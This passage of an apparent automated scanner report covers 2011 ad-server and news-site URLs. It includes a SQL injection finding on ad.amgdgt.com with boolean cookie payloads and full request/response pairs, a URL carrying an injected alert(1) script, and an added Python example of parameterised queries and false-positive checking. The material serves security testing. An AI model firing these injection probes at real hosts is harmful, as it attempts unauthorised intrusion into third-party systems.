25.86. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYoYcDIMCIAyoUxcMAAP___________________w8yCaHDAAD_____Dw

25.87. http://safebrowsing.clients.google.com/safebrowsing/gethash

25.88. http://search.twitter.com/search.json

25.89. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

25.90. http://segment-pixel.invitemedia.com/pixel

25.91. http://speed.pointroll.com/PointRoll/Media/Banners/UnitedHealthcare/857298/uhc_interactive_n3_728x90_default.jpg

25.92. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.93. http://static.pulse360.com/blob/3c/66d319f2_guru_pennyacutionsimage.gif

25.94. http://stats.vodpod.com/stats/widget/651730/blank.gif

25.95. http://store.androidcentral.com/external_marketing/js_a_v1.php

25.96. http://sync.mathtag.com/sync/img

25.97. http://tag.admeld.com/ad/json

25.98. http://tag.contextweb.com/TagPublish/getad.aspx

25.99. http://talkingpointsmemo.com/archives/2010/02/remember_rick_santorum.php

25.100. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html

25.101. http://toolbarqueries.clients.google.com/tbproxy/af/query

25.102. http://tracking.adjug.com/AdJugTracking/Tracker.aspx

25.103. http://turn.nexac.com/r/pu

25.104. http://um.simpli.fi/pm_match

25.105. http://va.px.invitemedia.com/adnxs_imp

25.106. http://www.androidcentral.com/android-central-google-io-2011

25.107. http://www.facebook.com/plugins/like.php

25.108. http://www.gather.com/css/core_layout.css

25.109. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/

25.110. http://www.google-analytics.com/__utm.gif

25.111. http://www.google.com/trends/hottrends

25.112. http://www.googleadservices.com/pagead/conversion/1030881291/

25.113. http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html

25.114. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html

25.115. http://www.linkedin.com/analytics/

25.116. http://www.meebo.com/cim/sandbox.php

25.117. http://www.philly.com/philly/news/nation_world/121548659.html

25.118. http://www.ricksantorum.com/

25.119. http://www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/

25.120. http://www.smartphoneexperts.com/

25.121. http://www.tlsubmit.com/

25.122. http://www.ultraedit.com/updates/ultracompare/ucupdate.html

25.123. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

25.124. http://www.youtube.com/embed/Iev7TKsXoHo

26. Cacheable HTTPS response

26.1. https://secure.smartphoneexperts.com/javascripts/highslide412/graphics/zoomout.cur

26.2. https://support.ccbill.com/

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

27.2. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2

27.3. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

27.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

27.5. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3

27.6. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

27.7. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.20

27.8. http://ad.doubleclick.net/adi/N5371.media6/B5451956.2

27.9. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6

27.10. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10

27.11. http://ad.doubleclick.net/adi/huffpost.politics/news

27.12. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech

27.13. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

27.14. http://ad.doubleclick.net/pfadx/philly_cim/

27.15. http://ad.yieldmanager.com/iframe3

27.16. http://ads.pointroll.com/PortalServe/

27.17. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

27.18. http://ads.specificmedia.com/serve/v=5

27.19. http://adsfac.us/ag.asp

27.20. http://afe.specificclick.net/

27.21. http://amch.questionmarket.com/adscgen/sta.php

27.22. http://bidder.mathtag.com/iframe/notify

27.23. http://bn.xp1.ru4.com/nf

27.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.25. http://cdn.slashgear.com/fbrecom.html

27.26. http://content.pulse360.com/7258D0CE-DD27-11DF-A9B2-6F2BEDADD848

27.27. http://delivery.uat.247realmedia.com/RealMedia/ads/adstream_sx.ads/zama/728x90

27.28. http://fast.ziffdavis.demdex.net/DSD-gz/ziffdavis-dest.html

27.29. http://geek.us.intellitxt.com/iframescript.jsp

27.30. http://image3.pubmatic.com/AdServer/UPug

27.31. http://load.exelator.com/load/

27.32. http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html

27.33. http://mediacdn.disqus.com/1304984847/build/system/def.html

27.34. http://mediacdn.disqus.com/1304984847/build/system/reply.html

27.35. http://mediacdn.disqus.com/1304984847/build/system/upload.html

27.36. http://p.brilig.com/contact/bct

27.37. http://ping.chartbeat.net/ping

27.38. http://pixel.intellitxt.com/pixel.jsp

27.39. http://pixel.invitemedia.com/data_sync

27.40. http://q1.checkm8.com/adam/detect

27.41. https://secure.smartphoneexperts.com/

27.42. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

27.43. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg

27.44. http://store.androidcentral.com/

27.45. http://store.androidcentral.com/belkin-headphone-splitter-y-adapter/11A75A6767.htm

27.46. http://store.androidcentral.com/cart.htm

27.47. http://store.androidcentral.com/content/customercare/index.htm

27.48. http://store.androidcentral.com/content/customercare/page-shipping.htm

27.49. http://store.androidcentral.com/favicon.ico

27.50. http://store.androidcentral.com/jabra-bt2080-bluetooth-headset/9A32A5717.htm

27.51. http://store.androidcentral.com/motorola-droid-x-batteries.htm

27.52. http://store.androidcentral.com/motorola-droid-x-bluetooth.htm

27.53. http://store.androidcentral.com/motorola-droid-x-headsets.htm

27.54. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None

27.55. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold

27.56. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/above_fold

27.57. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo

27.58. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo

27.59. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683

27.60. http://tags.bluekai.com/site/2554

27.61. http://uac.advertising.com/wrapper/aceUACping.htm

27.62. http://w55c.net/ct/cms-2-frame.html

27.63. http://www.slashgear.com/ads/rpufallover.html

27.64. http://www.spreadingsantorum.com/

27.65. http://www.spreadingsantorum.com/santorum_us1.html

27.66. http://www.spreadingsantorum.com/santorumsqueeze.html

27.67. http://www.tlsubmit.com/affiliate_signup.html

28. Content type incorrectly stated

28.1. http://a1.interclick.com/getInPageJS.aspx

28.2. http://a1.interclick.com/getInPageJSProcess.aspx

28.3. http://ad.bnmla.com/serve

28.4. http://ad.doubleclick.net/pfadx/philly_cim/

28.5. http://admeld.lucidmedia.com/clicksense/admeld/match

28.6. http://ads.pointroll.com/PortalServe/

28.7. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

28.8. http://ads.trove.com/RevenuePlatform/ad/pong

28.9. http://adsfac.us/ag.asp

28.10. http://afe.specificclick.net/

28.11. http://amch.questionmarket.com/adscgen/sta.php

28.12. http://api.js-kit.com/v1/bus/washpost.com/channel/130503326439488483

28.13. http://ar.voicefive.com/b/rc.pli

28.14. http://beacon.videoegg.com/admeldtest

28.15. http://beacon.videoegg.com/btf

28.16. http://beacon.videoegg.com/initjs

28.17. http://beacon.videoegg.com/invpos

28.18. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.19. http://chat.livechatinc.net/licence/1051282/script.cgi

28.20. http://content.pulse360.com/7258D0CE-DD27-11DF-A9B2-6F2BEDADD848

28.21. http://digg.com/tools/services

28.22. http://event.adxpose.com/event.flow

28.23. http://flash.qoof.com/widget.js.aspx

28.24. http://forum.androidcentral.com/external.php

28.25. http://hs.interpolls.com/cache/tmobile/affordability/300/inter_85.poll

28.26. http://hs.interpolls.com/cache/tmobile/affordability/300/inter_86.poll

28.27. http://hs.interpolls.com/imprimage.poll

28.28. http://hs.interpolls.com/ts1.poll

28.29. http://id.expressnightout.com/identity/public/visitor.json

28.30. http://id.slate.com/identity/public/visitor.json

28.31. http://id.theroot.com/identity/public/visitor.json

28.32. http://id.trove.com/identity/public/visitor.json

28.33. http://id.washingtonpost.com/identity/public/visitor/create

28.34. http://id.washingtonpost.com/identity/public/visitor/instance_datum.json

28.35. http://id.washingtonpost.com/identity/public/visitor/ip_address.json

28.36. http://image3.pubmatic.com/AdServer/UPug

28.37. http://imp.fetchback.com/serve/fb/adtag.js

28.38. http://letters.salon.com/favicon.ico

28.39. http://map.media6degrees.com/orbserv/hbjs

28.40. http://media.washingtonpost.com/wp-srv/ad/blog_147x41.js

28.41. http://media.washingtonpost.com/wp-srv/css/globalNav.css

28.42. http://mediacdn.disqus.com/1304984847/fonts/disqus-webfont.woff

28.43. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.img

28.44. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.img

28.45. http://paidcontent.org/images/site/favicon_mn.ico

28.46. http://pglb.buzzfed.com/10032/5aa834d4bb2efeab1df676685da0518c

28.47. http://ping.crowdscience.com/ping.js

28.48. http://pixel.intellitxt.com/pixel.jsp

28.49. http://politics.gather.com/js/siteReport.js.jspf

28.50. http://q1.checkm8.com/adam/detect

28.51. http://rt.disqus.com/forums/realtime-cached.js

28.52. http://s0.2mdn.net/1560758/Contests_728x90.gif

28.53. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php

28.54. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php

28.55. http://static.pulse360.com/blob/3c/66d319f2_guru_pennyacutionsimage.gif

28.56. http://ultraedit.app7.hubspot.com/salog.js.aspx

28.57. http://www.facebook.com/extern/login_status.php

28.58. http://www.geek.com/wp-content/themes/geek6/scripts/ajax_actions.js.php

28.59. http://www.geek.com/wp-content/themes/geek6/scripts/commonjs.php

28.60. http://www.geek.com/wp-content/themes/geek6/scripts/search.js.php

28.61. http://www.huffingtonpost.com/ads/check_flights.php

28.62. http://www.huffingtonpost.com/badge/badges_json_v2.php

28.63. http://www.knowyourmobile.com/img/bullet_red.gif

28.64. http://www.knowyourmobile.com/img/icon_delicious.gif

28.65. http://www.knowyourmobile.com/img/icon_digg.gif

28.66. http://www.knowyourmobile.com/img/icon_facebook.gif

28.67. http://www.knowyourmobile.com/img/icon_furl.gif

28.68. http://www.knowyourmobile.com/img/icon_stumbleupon.gif

28.69. http://www.knowyourmobile.com/img/navBackg.gif

28.70. http://www.knowyourmobile.com/img/rsslogo.gif

28.71. http://www.spreadingsantorum.com/index.rdf

28.72. http://www.surveygizmo.com/s3/polljs/539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H/

28.73. http://www.symbiosting.com/LogicBuy/geek/content-syndicate.php

28.74. http://www.ultraedit.com/favicon.ico

28.75. http://www.ultraedit.com/updates/ultracompare/ucupdates2

29. Content type is not specified

29.1. http://ad.trafficmp.com/a/js

29.2. http://ad.yieldmanager.com/st

29.3. http://pcm1.map.pulsemgr.com/uds/pc

29.4. http://pcm2.map.pulsemgr.com/uds/pc

29.5. http://tag.contextweb.com/TagPublish/getad.aspx

29.6. http://tracking.skyword.com/tracker.js

29.7. http://www.meebo.com/cmd/tc

30. SSL certificate

30.1. https://secure.smartphoneexperts.com/

30.2. https://support.ccbill.com/



1. SQL injection
There are 29 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, malformed data supplied in the second step cannot interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs for performing parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights and to avoid vulnerabilities being introduced by changes elsewhere in the application's code base.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective. Doubling up single quotation marks in user input only protects string contexts: where the input is used as a number and is not quoted, a single space is enough to break out of the data context, and in second-order attacks data that was escaped when first stored is read back from the database in its original form and passed into a later query unescaped. Stored procedures likewise give no guarantee on their own: SQL that is built dynamically inside a procedure is just as injectable as dynamic SQL anywhere else, and even a sound procedure can be invoked unsafely with user-controllable data.



1.1. http://ad.amgdgt.com/ads/ [ID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The ID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ID cookie. These two requests resulted in different responses, which the scanner takes as an indication that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the visible differences between the two responses are per-request values: a freshly issued ID and UA cookie in each Set-Cookie header, a different rnd= value in the embedded view.atdmt.com URL, a different s= token in the click URL, and a Content-Length of 5467 versus 5477 bytes. An ad server that mints a new identifier and rotates content on every call produces such differences regardless of the payload, so this finding should be re-tested by repeating the unmodified request several times: treat it as real only if that baseline is stable while the 1=1 and 1=2 responses differ consistently.
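The following Python script is an added illustration and is not part of the XSS.CX report, nor code belonging to any of the hosts listed in it. It puts the remediation advice above and the difference-based test used in this issue side by side: a lookup that splices a cookie value into the SQL text, the same lookup rewritten with a bound parameter, and a checker that only reports a difference between the 1=1 and 1=2 payloads when the unmodified request is itself stable across repeats. The table, its rows, the shortened cookie value and the simulated ad-server response bodies are all constructed for the example; the real backend behind ad.amgdgt.com is not known from the report.

```python
import sqlite3
from itertools import cycle

# Constructed in-memory table standing in for whatever store the ad server
# keys on the ID cookie. Schema, rows and the short cookie value are
# assumptions made for this example, not taken from the report.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE visitors (id TEXT PRIMARY KEY, segment TEXT)")
DB.executemany("INSERT INTO visitors VALUES (?, ?)",
               [("AAAAAQAU6fB5", "tech"), ("BBBBBQAU1234", "auto")])
DB.commit()

# The two scanner payloads as the server sees them after URL decoding
# '%20and%201%3d1--%20 and '%20and%201%3d2--%20.
TRUE_PAYLOAD = "' and 1=1-- "
FALSE_PAYLOAD = "' and 1=2-- "


def lookup_unsafe(cookie_id):
    """Vulnerable pattern: the cookie value is spliced into the SQL text.

    With TRUE_PAYLOAD the statement becomes
        ... WHERE id = 'AAAAAQAU6fB5' and 1=1-- '
    so the closing quote is commented out and the attacker controls
    the predicate.
    """
    sql = "SELECT segment FROM visitors WHERE id = '%s'" % cookie_id
    return [row[0] for row in DB.execute(sql)]


def lookup_safe(cookie_id):
    """Remediated pattern: structure is fixed first, the value is bound
    second, so the payload is compared as a literal string and matches
    nothing."""
    sql = "SELECT segment FROM visitors WHERE id = ?"
    return [row[0] for row in DB.execute(sql, (cookie_id,))]


def unsafe_probe(cookie_id):
    """Simulated response body of a server built on lookup_unsafe."""
    return "segments=" + ",".join(lookup_unsafe(cookie_id))


def safe_probe(cookie_id):
    """Simulated response body of a server built on lookup_safe."""
    return "segments=" + ",".join(lookup_safe(cookie_id))


def rotating_probe():
    """A safe server that, like an ad server, rotates the creative it
    returns on every request, so consecutive responses differ anyway."""
    creatives = cycle(["creative_A.swf", "creative_B.swf"])

    def probe(cookie_id):
        return "segments=%s;creative=%s" % (
            ",".join(lookup_safe(cookie_id)), next(creatives))
    return probe


def differential_test(probe, base, repeats=3):
    """Boolean difference-based check with a noise gate.

    Returns 'inconclusive', 'not_injectable' or 'likely_injectable'.
    """
    # Gate 1: the unmodified request must answer identically every time.
    # If the baseline already varies, a TRUE/FALSE difference is just noise.
    if len({probe(base) for _ in range(repeats)}) > 1:
        return "inconclusive"
    true_responses = {probe(base + TRUE_PAYLOAD) for _ in range(repeats)}
    false_responses = {probe(base + FALSE_PAYLOAD) for _ in range(repeats)}
    # Gate 2: each payload must itself be stable across repeats.
    if len(true_responses) > 1 or len(false_responses) > 1:
        return "inconclusive"
    # Stable but different answers to 1=1 and 1=2 is the real signal.
    if true_responses != false_responses:
        return "likely_injectable"
    return "not_injectable"


if __name__ == "__main__":
    base = "AAAAAQAU6fB5"
    for name, probe in [("string-concatenated", unsafe_probe),
                        ("parameterised", safe_probe),
                        ("parameterised + creative rotation", rotating_probe())]:
        print("%-36s %s" % (name, differential_test(probe, base)))
```

Run directly, the script prints one verdict per simulated server. The third probe is the case to watch for with ad servers: a host that issues a fresh cookie or rotates creatives on every call answers differently to any two requests, and a checker without the baseline gate would report it as injectable on exactly the evidence shown in this report.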

Request 1

GET /ads/?t=i&f=j&p=5112&pl=c4bd92c5&rnd=60913016647100450&clkurl=http://ib.adnxs.com/click/H4XrUbgeAUAfhetRuB4BQAAAAKCZmQlAmpmZmZmZCUCamZmZmZkJQFFFHlTWPNEMSsYda6b2ziU7OslNAAAAABUbAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgC1GHIAPhABAgUCAAQAAAAAPCEvmAAAAAA./cnd=!kR7geQi_kAMQyMkKGAAg0ccBMAA4tTFAAEiWBVAAWABg2gFoAHCsAnj8W4AB9gSIAaQUkAEBmAEBoAEDqAEDsAEBuQEAAACgmZkJQMEBAAAAoJmZCUDJAbjdQpCsz7k_0AEA/referrer=http%3A%2F%2Fwww.androidcentral.com%2Fandroid-central-google-io-2011/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB3vh7OzrJTeDtMse36Qbe6eiBDtfq-NMBr56U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTE0OTkyOTE0OTEwODQ3oAHD8v3sA7IBFnd3dy5hbmRyb2lkY2VudHJhbC5jb226AQk3Mjh4OTBfYXPIAQnaATxodHRwOi8vd3d3LmFuZHJvaWRjZW50cmFsLmNvbS9hbmRyb2lkLWNlbnRyYWwtZ29vZ2xlLWlvLTIwMTGYAtwQwAIEyAKF0s8KqAMB6AOOCOgDrwjoA-gE6AOTCfUDAAAAxIAG--Ohhf7g767AAQ%26num%3D1%26sig%3DAGiWqtyPZXDoeqgWv10Nz_yf_zYwhy0uEQ%26client%3Dca-pub-9914992914910847%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--'%20and%201%3d1--%20; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUNCYV.fzBKzXiM_IlgLbxozis.EcDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDcHKmVgCLzFKMgITFY7GfmBFIMBPwMTEz8zIwsjKyMbIzsjByMnIxcjNyMPIy8jH1gJSyajCFDl0gKwPgUziGAIkwijKFBYfhcPbq2L3RmB7gOl34z5U0BuYWAAAI6Mla4-

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUYGo0nk8a73lDHZRXSGxC4Xj5Q.4AAGnnbqfYNksGmO3Sj_V0qlYAAAEv2iUwwg--; Domain=.amgdgt.com; Expires=Fri, 07-May-2021 13:42:41 GMT; Path=/
Set-Cookie: UA=AAAAAQAUVnGtjbSHRthVuiIOriMwdo2_m88DA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv1bqgaHoHKtQLkfQDlXmNzVtJOfccqlvmHAZeaRfwuscOnb5NGZgUvfxptxk6FyLUC3_AS6xQ3mlo3mN01w6jNP18ctJwF0Z.cSoN.bgWb.AprpDjNzkn6EP1QOw..9HNu8oXIYbunlcOnHJdeRHXMKp1yS23WcchFe13DK.U0IwSnn2sABlcOI2w4J99s49UnYaePS135y5yZgGDHi0tte2S0ElGfwPdHAwMDFwLDcnImBkZGRgSHwFqMQkOLcySgApBgMBBmYGBmZ.JgZWRhZGdkY2Rk5GDkZuRi5GXkYeRn5GPnBylgyGUWBqpcWgPUqmEEEQ5hEGcWAwvK7eHBrXewOthaaikFOYgAALdmVAg--; Domain=.amgdgt.com; Expires=Thu, 09-Jun-2011 13:42:41 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5467
Date: Tue, 10 May 2011 13:42:40 GMT

_289670_amg_acamp_id=172249;
_289670_amg_pcamp_id=69111;
_289670_amg_location_id=55364;
_289670_amg_creative_id=289670;
_289670_amg_loaded=true;
var _amg_289670_content='<script type="text/javascript"
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732014/direct/01/rnd=35491822/rnd=35491822?click=http://ad.amgdgt.com/ads/t=c/s=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--/clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlLyLmGcZo6fsAAQuvRbcQO6Nn5RnZW8sdXNhLHQsMTMwNTAzNDk2MTA5MSxjLDI4OTY3MCxwYyw2OTExMSxhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQVVBZmhldFJ1QjRCUUFBQUFLQ1ptUWxBbXBtWm1abVpDVUNhbVptWm1aa0pRRkZGSGxUV1BORU1Tc1lkYTZiMnppVTdPc2xOQUFBQUFCVWJBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0MxR0hJQVBoQUJBZ1VDQUFRQUFBQUFQQ0V2bUFBQUFBQS4vY25kPSFrUjdnZVFpX2tBTVF5TWtLR0FBZzBjY0JNQUE0dFRGQUFFaVdCVkFBV0FCZzJnRm9BSENzQW5qOFc0QUI5Z1NJQWFRVWtBRUJtQUVCb0FFRHFBRURzQUVCdVFFQUFBQ2dtWmtKUU1FQkFBQUFvSm1aQ1VESkFiamRRcENzejdrXzBBRUEvcmVmZXJyZXI9aH
...[SNIP]...

Request 2

GET /ads/?t=i&f=j&p=5112&pl=c4bd92c5&rnd=60913016647100450&clkurl=http://ib.adnxs.com/click/H4XrUbgeAUAfhetRuB4BQAAAAKCZmQlAmpmZmZmZCUCamZmZmZkJQFFFHlTWPNEMSsYda6b2ziU7OslNAAAAABUbAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgC1GHIAPhABAgUCAAQAAAAAPCEvmAAAAAA./cnd=!kR7geQi_kAMQyMkKGAAg0ccBMAA4tTFAAEiWBVAAWABg2gFoAHCsAnj8W4AB9gSIAaQUkAEBmAEBoAEDqAEDsAEBuQEAAACgmZkJQMEBAAAAoJmZCUDJAbjdQpCsz7k_0AEA/referrer=http%3A%2F%2Fwww.androidcentral.com%2Fandroid-central-google-io-2011/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB3vh7OzrJTeDtMse36Qbe6eiBDtfq-NMBr56U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTE0OTkyOTE0OTEwODQ3oAHD8v3sA7IBFnd3dy5hbmRyb2lkY2VudHJhbC5jb226AQk3Mjh4OTBfYXPIAQnaATxodHRwOi8vd3d3LmFuZHJvaWRjZW50cmFsLmNvbS9hbmRyb2lkLWNlbnRyYWwtZ29vZ2xlLWlvLTIwMTGYAtwQwAIEyAKF0s8KqAMB6AOOCOgDrwjoA-gE6AOTCfUDAAAAxIAG--Ohhf7g767AAQ%26num%3D1%26sig%3DAGiWqtyPZXDoeqgWv10Nz_yf_zYwhy0uEQ%26client%3Dca-pub-9914992914910847%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--'%20and%201%3d2--%20; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUNCYV.fzBKzXiM_IlgLbxozis.EcDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDcHKmVgCLzFKMgITFY7GfmBFIMBPwMTEz8zIwsjKyMbIzsjByMnIxcjNyMPIy8jH1gJSyajCFDl0gKwPgUziGAIkwijKFBYfhcPbq2L3RmB7gOl34z5U0BuYWAAAI6Mla4-

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUFnAZLJAYnZCQqKLDoGMELWRESL8AAPigs5WyP0ZKmWY5_ClDWN8AAAEv2iU2Cg--; Domain=.amgdgt.com; Expires=Fri, 07-May-2021 13:42:42 GMT; Path=/
Set-Cookie: UA=AAAAAQAUjCULET8mbtaeXKfDDnJrHKPwibADA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv1bqmZcULlWoNwPoJwrTO5q2snPOOVS3zDgMvPIvwVWuPRt8ujMwKVv4824yVC5FqBbfgLd4gZzy0bzmyY49Zmn6.OWkwC6s3MJ0O_NQDN_Ac10h5k5ST_CHyqH4fdejm3eUDkMt_RyuPTjkuvIjjmFUy7J7TpOuQivazjl_CaE4JRzbeCAymHEbYeE.22c.iTstHHpaz.5cxMwjBhx6W2v7BYCyjP4nmhgYOBiYFhuzsTAyMjIwBB4i1EISHHuZBQAUgwGggxMjIxMfMyMLIysjGyM7IwcjJyMXIzcjDyMvIx8jPxgZSyZjKJA1UsLwHoVzCCCIUyijGJAYfldPLi1LnYHWwtNxSAnMQAANl.Tng--; Domain=.amgdgt.com; Expires=Thu, 09-Jun-2011 13:42:42 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5477
Date: Tue, 10 May 2011 13:42:41 GMT

_289670_amg_acamp_id=172249;
_289670_amg_pcamp_id=69111;
_289670_amg_location_id=55364;
_289670_amg_creative_id=289670;
_289670_amg_loaded=true;
var _amg_289670_content='<script type="text/javascript"
...[SNIP]...
